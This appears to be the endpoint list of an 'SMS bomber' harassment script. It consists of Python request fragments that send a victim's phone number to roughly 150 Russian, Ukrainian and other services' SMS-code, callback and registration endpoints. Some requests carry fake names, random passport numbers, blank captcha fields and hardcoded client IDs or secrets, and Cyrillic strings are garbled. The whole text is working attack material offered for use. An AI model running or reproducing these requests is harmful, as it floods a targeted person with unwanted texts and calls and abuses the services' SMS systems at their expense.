

https://zoloto585.ru/api/bcard/reg/", json={"name":"","surname":"","patronymic":"","sex":"m","birthdate":"..","phone":self.mask(str=phone, maska="+# (###) ###-##-##"),"email":"","city":""})
https://3040.com.ua/taxi-ordering", data={"callback-phone": phone})
http://xn---72-5cdaa0cclp5fkp4ewc.xn--p1ai/user_account/ajax222.php?do=sms_code",data={"phone": self.mask(str=phone[1:], maska="8(###)###-##-##")})
https://youla.ru/web-api/auth/request_code", data={"phone": phone})
https://yaponchik.net/login/login.php",data={"login": "Y","countdown": "0","step": "phone","redirect": "/profile/","phone": self.mask(str=phone, maska="+# (###) ###-##-##"), "code":""})
https://eda.yandex/api/v1/user/request_authentication_code", json={"phone_number": "+"+phone})
https://api.iconjob.co/api/auth/verification_code",json={"phone": phone})
https://cabinet.wi-fi.ru/api/auth/by-sms",data={"msisdn": phone})
https://ng-api.webbankir.com/user/v2/create",json={"lastName":"РёРІР°РЅРѕРІ","firstName":"РёРІР°РЅ","middleName":"РёРІР°РЅРѕРІРёС‡","mobilePhone":phone,"email":email,"smsCode":""})
https://shop.vsk.ru/ajax/auth/postSms/", data={"phone": phone})
https://b.utair.ru/api/v1/profile/", json={"phone":phone,"confirmationGDPRDate": int(str(datetime.datetime.now().timestamp()).split('.')[0]) })
https://b.utair.ru/api/v1/login/", json={"login":phone,"confirmation_type":"call_code"}) 
https://www.r-ulybka.ru/login/form_ajax.php", data={"action":"auth","phone":self.mask(str=phone, maska="#(###)###-##-##")})
https://www.r-ulybka.ru/login/form_ajax.php", data={"phone":self.mask(str=phone, maska="+#(###)###-##-##"),"action":"sendSmsAgain"})
https://uklon.com.ua/api/v1/account/code/send",headers={"client_id": "6289de851fc726f887af8d5d7a56c635"},json={"phone": phone},)
https://partner.uklon.com.ua/api/v1/registration/sendcode",headers={"client_id": "6289de851fc726f887af8d5d7a56c635"},json={"phone": phone})
https://secure.ubki.ua/b2_api_xml/ubki/auth",json={"doc": {"auth": {"mphone": "+" + phone,"bdate": "11.11.1999","deviceid": "00100","version": "1.0","source": "site","signature": "undefined",}}},headers={"Accept": "application/json"})
https://www.top-shop.ru/login/loginByPhone/",data={"phone": self.mask(str=phone, maska="+# (###) ###-##-##")})
https://topbladebar.ru/user_account/ajax222.php?do=sms_code",data={"phone": self.mask(str=phone, maska="8(###)###-##-##")})
https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru",data={"phone_number": phone})
https://m.tiktok.com/node-a/send/download_link",json={"slideVerify":0,"language":"ru","PhoneRegionCode":"7","Mobile":phone9,"page":{"pageName":"home","launchMode":"direct","trafficType":""}})
https://thehive.pro/auth/signup", json={"phone": "+"+phone})
https://msk.tele2.ru/api/validation/number/"+phone, json={"sender": "Tele2"},)
https://www.taxi-ritm.ru/ajax/ppp/ppp_back_call.php",data={"RECALL": "Y", "BACK_CALL_PHONE": phone})
https://www.tarantino-family.com/wp-admin/admin-ajax.php",data={"action": "callback_phonenumber", "phone": phone})
https://www.tanuki.ru/api/",json={"header": {"version": "2.0","userId": f"002ebf12-a125-5ddf-a739-67c3c5d{randint(20000, 90000)}","agent": {"device": "desktop", "version": "undefined undefined"},"langId": "1","cityId": "9",},"method": {"name": "sendSmsCode"},"data": {"phone": self.mask(str=phone, maska="(+#)##########"), "type": 1}})
https://lk.tabris.ru/reg/", data={"action": "phone", "phone": phone})
https://tabasko.su/",data={"IS_AJAX": "Y","COMPONENT_NAME": "AUTH","ACTION": "GET_CODE","LOGIN": phone,})
https://www.sushi-profi.ru/api/order/order-call/",json={"phone": phone9, "name": name},)
https://client-api.sushi-master.ru/api/v1/auth/init",json={"phone": phone})
https://xn--80aaispoxqe9b.xn--p1ai/user_account/ajax.php?do=sms_code",data={"phone": self.mask(str=phone9, maska="8(###)###-##-##")})
http://sushigourmet.ru/auth",data={"phone": self.mask(str=phone9, maska="8 (###) ###-##-##"), "stage": 1})
https://sushifuji.ru/sms_send_ajax.php",data={"name": "false", "phone": phone})
https://auth.pizza33.ua/ua/join/check/",params={"callback": "angular.callbacks._1","email": email,"word": word,"phone": phone9,"utm_current_visit_started": 0,"utm_first_visit": 0,"utm_previous_visit": 0,"utm_times_visited": 0})
https://api.sunlight.net/v3/customers/authorization/",data={"phone": phone},)
https://suandshi.ru/mobile_api/register_mobile_user",params={"phone": phone,},)
https://pizzasushiwok.ru/index.php",data={"mod_name": "registration","tpl": "restore_word","phone": self.mask(str=phone9, maska="8-###-###-##-##")})
https://www.sportmaster.ua/", params={"module": "users", "action": "SendSMSReg", "phone": phone})
https://www.sportmaster.ru/user/session/sendSmsCode.do", params={"phone": self.mask(str=phone, maska="+# (###) ###-##-##")})
https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php",data={"demo_number": "+" + phone, "ajax_demo_send": "1"})
https://smart.space/api/users/request_confirmation_code/",json={"mobile": "+"+phone, "action": "confirm_mobile"})
https://shopandshow.ru/sms/word-request/",data={"phone": "+"+phone, "resend": 0})
https://shafa.ua/api/v3/graphiql",json={"operationName": "RegistrationSendSms","variables": {"phoneNumber": "+"+phone},"query": "mutation RegistrationSendSms($phoneNumber: String!) {\n  unauthorizedSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      field\n      messages {\n        message\n        code\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n",})
https://shafa.ua/api/v3/graphiql",json={"operationName": "sendResetwordSms","variables": {"phoneNumber": "+"+phone},"query": "mutation sendResetwordSms($phoneNumber: String!) {\n  resetwordSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      ...errorsData\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment errorsData on GraphResponseError {\n  field\n  messages {\n    code\n    message\n    __typename\n  }\n  __typename\n}\n"})
https://sayoris.ru/?route=parse/whats", data={"phone": phone})
https://api.saurisushi.ru/Sauri/api/v2/auth/login",data={"data": {"login":phone9,"check":True,"crypto":{"captcha":"739699"}}})
https://.rutube.ru/api/accounts/phone/send-word/",json={"phone": "+"+phone})
https://rutaxi.ru/ajax_auth.html", data={"l": phone9, "c": "3"},)
https://rieltor.ua/api/users/register-sms/",json={"phone": phone, "retry": 0},)
https://richfamily.ru/ajax/sms_activities/sms_validate_phone.php",data={"phone": "+"+phone})
https://www.rendez-vous.ru/ajax/SendPhoneConfirmationNew/",data={"phone": self.mask(str=phone, maska="+#(###)###-##-##"), "alien": "0"})
https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code",params={"number": phone})
https://qlean.ru/clients-api/v2/sms_codes/auth/request_code",json={"phone": phone})
https://sso.cloud.qlean.ru/http/users/requestotp",headers={"Referer": "https://qlean.ru/sso?redirectUrl=https://qlean.ru/"},params={"phone": phone,"clientId": "undefined","sessionId": str(randint(5000, 9999))})
https://www.prosushi.ru/php/profile.php",data={"phone": "+"+phone, "mode": "sms"})
https://api.pozichka.ua/v1/registration/send",json={"RegisterSendForm": {"phone": self.mask(str=phone, maska="+#-###-###-##-##")}})
https://butovo.pizzapomodoro.ru/ajax/user/auth.php",data={"AUTH_ACTION": "SEND_USER_CODE","phone": self.mask(str=phone, maska="+# (###) ###-##-##")})
https://pliskov.ru/Cube.MoneyRent.Orchard.RentRequest/PhoneConfirmation/SendCode",data={"phone": self.mask(str=phone, maska="+# (###) ###-##-##")})
https://cabinet.planetakino.ua/service/sms", params={"phone": phone})
https://pizzasushiwok.ru/index.php",data={"mod_name": "call_me","task": "request_call","name": name,"phone": self.mask(str=phone9, maska="8-###-###-##-##")})
https://pizzasinizza.ru/api/phoneCode.php", json={"phone": phone9})
https://pizzakazan.com/auth/ajax.php",data={"phone": "+"+phone, "method": "sendCode"})
https://pizza46.ru/ajaxGet.php",data={"phone": self.mask(str=phone, maska="+# (###) ###-####")})
https://piroginomerodin.ru/index.php?route=sms/login/sendreg",data={"telephone": "+"+phone},)
https://paylate.ru/registry",data={"mobile": self.mask(str=phone, maska="+#-###-###-##-##"),"first_name": name,"last_name": name,"nick_name": name,"gender-client": 1,"email": email,"action": "registry"})
https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode",data={"telephone": "8"+phone9})
https://www.ozon.ru/api/composer-api.bx/_action/fastEntry",json={"phone": phone, "otpId": 0})
https://www.osaka161.ru/local/tools/webstroy.webservice.php",data={"name": "Auth.Sendword","params[0]": self.mask(str=phone, maska="+# (###) ###-####")})
https://ontaxi.com.ua/api/v2/web/client",json={"country": "UA","phone": phone[3:]})
https://secure.online.ua/ajax/check_phone/", params={"reg_phone": phone})
https://www.ollis.ru/gql", json={{"query":"mutation { phone(number:\""+phone+"\", locale:ru) { token error { code message } } }"}})
https://okeansushi.ru/includes/contact.php",params={"call_mail": "1","ajax": "1","name": name,"phone": self.mask(str=phone9, maska="8 (###) ###-##-##"),"call_time": "1","pravila2": "on"})
https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone",data={"st.r.phone": "+"+phone})
https://nn-card.ru/api/1.0/covid/login", json={"phone": phone})
https://www.nl.ua",data={"component": "bxmaker.authuserphone.login","sessid": "bf70db951f54b837748f69b75a61deb4","method": "sendCode","phone": phone,"registration": "N"})
https://www.niyama.ru/ajax/sendSMS.php",data={"REGISTER[PERSONAL_PHONE]": phone,"code": "","sendsms": "Р’С‹СЃР»Р°С‚СЊ РєРѕРґ"})
https://account.my.games/signup_send_sms/", data={"phone": phone})
https://auth.multiplex.ua/login", json={"login": phone})
https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code",params={"msisdn": phone})
https://www.moyo.ua/identity/registration",data={"firstname": name,"phone": phone,"email": email})
https://mos.pizza/bitrix/components/custom/callback/templates/.default/ajax.php",data={"name": name, "phone": phone})
https://www.monobank.com.ua/api/mobapplink/send",data={"phone": "+"+phone},)
https://moneyman.ru/registration_api/actions/send-confirmation-code",data="+"+phone)
https://my.modulbank.ru/api/v2/registration/nameAndPhone",json={"FirstName": name, "CellPhone": phone, "Package": "optimal"})
https://mobileplanet.ua/register",data={"klient_name": name,"klient_phone": "+"+phone,"klient_email": email})
f"http://mnogomenu.ru/office/word/reset/"+self.mask(str=phone, maska="+# (###) ### ## ##"))
https://my.mistercash.ua/ru/send/sms/registration",params={"number": "+"+phone})
https://menza-cafe.ru/system/call_me.php",params={"fio": name, "phone": phone, "phone_number": "1"})
https://www.menu.ua/kiev/delivery/registration/direct-registration.html",data={"user_info[fullname]": name,"user_info[phone]": phone,"user_info[email]": email,"user_info[word]": word,"user_info[conf_word]": word})
https://www.menu.ua/kiev/delivery/profile/show-verify.html",data={"phone": phone, "do": "phone"})
https://makimaki.ru/system/callback.php",params={"cb_fio": name,"cb_phone": self.mask(str=phone, maska="+# ### ### ## ##")})
https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php",data={"data": phone, "metod": "postreg"})
https://api-rest.logistictech.ru/api/v1.1/clients/request-code",json={"phone": phone},headers={"Restaurant-chain": "c0ab3d88-fba8-47aa-b08d-c7598a3be0b9"})
https://loany.com.ua/funct/ajax/registration/code",data={"phone":phone})
https://rubeacon.com/api/app/5ea871260046315837c8b6f3/middle",json={"url": "/api/client/phone_verification","method": "POST","data": {"client_id": 5646981, "phone": phone, "alisa_id": 1},"headers": {"Client-Id": 5646981,"Content-Type": "application/x-www-form-urlencoded"}})
https://lenta.com/api/v1/authentication/requestValidationCode",json={"phone": "+"+phone})
https://koronapay.com/transfers/online/api/users/otps",data={"phone": phone})
https://api.kinoland.com.ua/api/v1/service/send-sms",headers={"Agent": "website"},json={"Phone":phone, "Type": 1})
https://kilovkusa.ru/ajax.php",params={"block": "auth", "action": "send_register_sms_code", "data_type": "json"},data={"phone": self.mask(str=phone, maska="# (###) ###-##-##")})
https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms",json={"phone": "+"+phone})
https://kaspi.kz/util/send-app-link", data={"address": phone9})
https://app.karusel.ru/api/v1/phone/", data={"phone": phone})
https://izi.ua/api/auth/register",json={"phone": "+"+phone,"name": name,"is_terms_accepted": True})
https://izi.ua/api/auth/sms-login", json={"phone": "+"+phone})
https://api.ivi.ru/mobileapi/user/register/phone/v6",data={"phone":phone})
https://iqlab.com.ua/session/ajaxregister",data={"cellphone": self.mask(str=phone, maska="+## (###) ###-##-##")})
https://lk.invitro.ru/sp/mobileApi/createUserByword",data={"word": word,"application": "lkp","login": "+"+phone})
https://www.ingos.ru/api/v1/lk/auth/register/fast/step2",headers={"Referer": "https://www.ingos.ru/cabinet/registration/personal"},json={"Birthday": "1986-07-10T07:19:56.276+02:00","DocIssueDate": "2004-02-05T07:19:56.276+02:00","DocNumber": randint(500000, 999999),"DocSeries": randint(5000, 9999),"FirstName": name,"Gender": "M","LastName": name,"SecondName": name,"Phone": phone9,"Email": email})
https://informatics.yandex/api/v1/registration/confirmation/phone/send/",data={"country": "RU","csrfmiddlewaretoken": "","phone": phone})
https://terra-1.indriverapp.com/api/authorization?locale=ru",data={"mode": "request","phone": "+"+phone,"phone_permission": "unknown","stream_id": 0,"v": 3,"appversion": "3.20.6","osversion": "unknown","devicemodel": "unknown"})
https://api.imgur.com/account/v1/phones/verify",json={"phone_number": phone, "region_code": "RU"})
https://www.icq.com/smsreg/requestPhoneValidation.php",data={"msisdn": phone,"locale": "en","countryCode": "ru","version": "1","k": "ic1rtwz1s1Hj1O0r","r": "46763"})
https://api.hmara.tv/stable/entrance", params={"contact": phone})
https://helsi.me/api/healthy/accounts/login",json={"phone": phone, "platform": "PISWeb"})
https://www.hatimaki.ru/register/",data={"REGISTER[LOGIN]": phone,"REGISTER[PERSONAL_PHONE]": phone,"REGISTER[SMS_CODE]": "","resend-sms": "1","REGISTER[EMAIL]": "","register_submit_button": "Р—Р°СЂРµРіРёСЃС‚СЂРёСЂРѕРІР°С‚СЊСЃСЏ"})
https://guru.taxi/api/v1/driver/session/verify",json={"phone": {"code": 1, "number": phone9}},)
https://crm.getmancar.com.ua/api/veryfyaccount",json={"phone": "+"+phone,"grant_type": "word","client_id": "gcarAppMob","client_secret": "SomeRandomCharsAndNumbersMobile"})
https://friendsclub.ru/assets/components/pl/connector.php",data={"casePar": "authSendsms", "MobilePhone": "+"+phone})
https://foodband.ru/api?call=calls",data={"customerName": name,"phone": self.mask(str=phone, maska="+# (###) ###-##-##"),"g-recaptcha-response": ""})
https://foodband.ru/api/",params={"call": "customers/sendVerificationCode","phone": phone9,"g-recaptcha-response": ""})
https://www.flipkart.com/api/5/user/otp/generate",headers={"Origin": "https://www.flipkart.com","X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop"},data={"loginId": "+"+phone})
https://www.flipkart.com/api/6/user/signup/status",headers={"Origin": "https://www.flipkart.com","X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop"},json={"loginId": "+"+phone, "supportAllStates": True})
https://fix-price.ru/ajax/register_phone_code.php",data={"register_call": "Y", "action": "getCode", "phone": "+"+phone})
https://findclone.ru/register", params={"phone": "+"+phone})
https://www.finam.ru/api/smslocker/sendcode",data={"phone": "+"+phone})
https://2407.smartomato.ru/account/session",json={"phone": self.mask(str=phone, maska="+# (###) ###-##-##"),"g-recaptcha-response": None})
https://www.etm.ru/cat/runprog.html",data={"m_phone":phone9,"mode": "sendSms","syf_prog": "clients-services","getSysParam": "yes"})
https://api.eldorado.ua/v1/sign/",params={"login": phone,"step": "phone-check","fb_id": "null","fb_token": "null","lang": "ru"})
https://e-groshi.com/online/reg",data={"first_name": name,"last_name": name,"third_name": name,"phone": self.mask(str=phone, maska="+## (###) ###-##-##"),"word": word,"word2": word})
https://vladimir.edostav.ru/site/CheckAuthLogin",data={"phone_or_email": "+"+phone})
https://api.easypay.ua/api/auth/register",json={"phone": phone, "word": word})
https://my.dianet.com.ua/send_sms/", data={"phone": phone})
https://api.delitime.ru/api/v2/signup",data={"SignupForm[username]": phone, "SignupForm[device_type]": 3})
https://api.creditter.ru/confirm/sms/send",json={"phone": self.mask(str=phone, maska="+# (###) ###-##-##"),"type": "register"})
https://clients.cleversite.ru/callback/run.php",data={"siteid": "62731","num":phone,"title": "РћРЅР»Р°Р№РЅ-РєРѕРЅСЃСѓР»СЊС‚Р°РЅС‚","referrer": "https://m.cleversite.ru/call"})
https://city24.ua/personalaccount/account/registration",data={"PhoneNumber": phone})
f"https://www.citilink.ru/registration/confirm/phone/+{phone}/")
https://cinema5.ru/api/phone_code",data={"phone": self.mask(str=phone, maska="+# (###) ###-##-##")})
https://api.cian.ru/sms/v1/send-validation-code/",json={"phone": "+"+phone, "type": "authenticateCode"})
https://api.carsmile.com/",json={"operationName": "enterPhone","variables": {"phone": phone},"query": "mutation enterPhone($phone: String!) {\n  enterPhone(phone: $phone)\n}\n"})
https://it.buzzolls.ru:9995/api/v2/auth/register",params={"phoneNumber": "+"+phone,},headers={"keywordapi": "ProjectVApiKeyword", "usedapiversion": "3"})
https://bluefin.moscow/auth/register/",data={"phone": self.mask(str=phone9, maska="(###)###-##-##"), "sendphone": "Р”Р°Р»РµРµ"})
https://app.benzuber.ru/login", data={"phone": "+"+phone})
https://bartokyo.ru/ajax/login.php",data={"user_phone": self.mask(str=phone, maska="+# (###) ###-##-##")})
https://bamper.by/registration/?step=1",data={"phone": "+"+phone,"submit": "Р—Р°РїСЂРѕСЃРёС‚СЊ СЃРјСЃ РїРѕРґС‚РІРµСЂР¶РґРµРЅРёСЏ","rules": "on"})
https://avtobzvon.ru/request/makeTestCall",params={"to": self.mask(str=phone9, maska="(###) ###-##-##")})
https://oauth.av.ru/check-phone",json={"phone": self.mask(str=phone, maska="+# (###) ###-##-##")})
https://api-prime.anytime.global/api/v2/auth/sendVerificationCode",data={"phone": phone})
https://apteka.ru/_action/auth/getForm/",data={"form[NAME]": "","form[PERSONAL_GENDER]": "","form[PERSONAL_BIRTHDAY]": "","form[EMAIL]": "","form[LOGIN]": self.mask(str=phone, maska="+# (###) ###-##-##"),"form[WORD]": word,"get-new-word": "РџРѕР»СѓС‡РёС‚Рµ РїР°СЂРѕР»СЊ РїРѕ SMS","user_agreement": "on","personal_data_agreement": "on","formType": "simple","utc_offset": "120"})
